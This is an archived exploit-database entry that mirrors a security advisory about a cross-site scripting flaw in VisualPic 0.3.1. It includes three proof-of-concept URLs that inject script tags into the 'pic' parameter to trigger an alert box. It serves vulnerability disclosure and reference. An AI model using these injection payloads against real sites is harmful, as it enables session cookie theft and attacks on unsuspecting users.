exploit-db-mirror/platforms/php/webapps/32103.txt
Offensive Security d1566a5701 Updated 03_09_2014
2014-03-09 04:29:44 +00:00

11 lines
No EOL
727 B
Text
Executable file

source: http://www.securityfocus.com/bid/30334/info
VisualPic is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
VisualPic 0.3.1 is vulnerable; other versions may be affected as well.
http://www.example.com/visualpic/?login&pic=>"><script>alert("XSS")</script>
http://www.example.com/visualpic/?pic=%00'"><script>alert("XSS")</script>
http://www.example.com/visualpic/?login&pic=>"><script>alert("XSS")</script>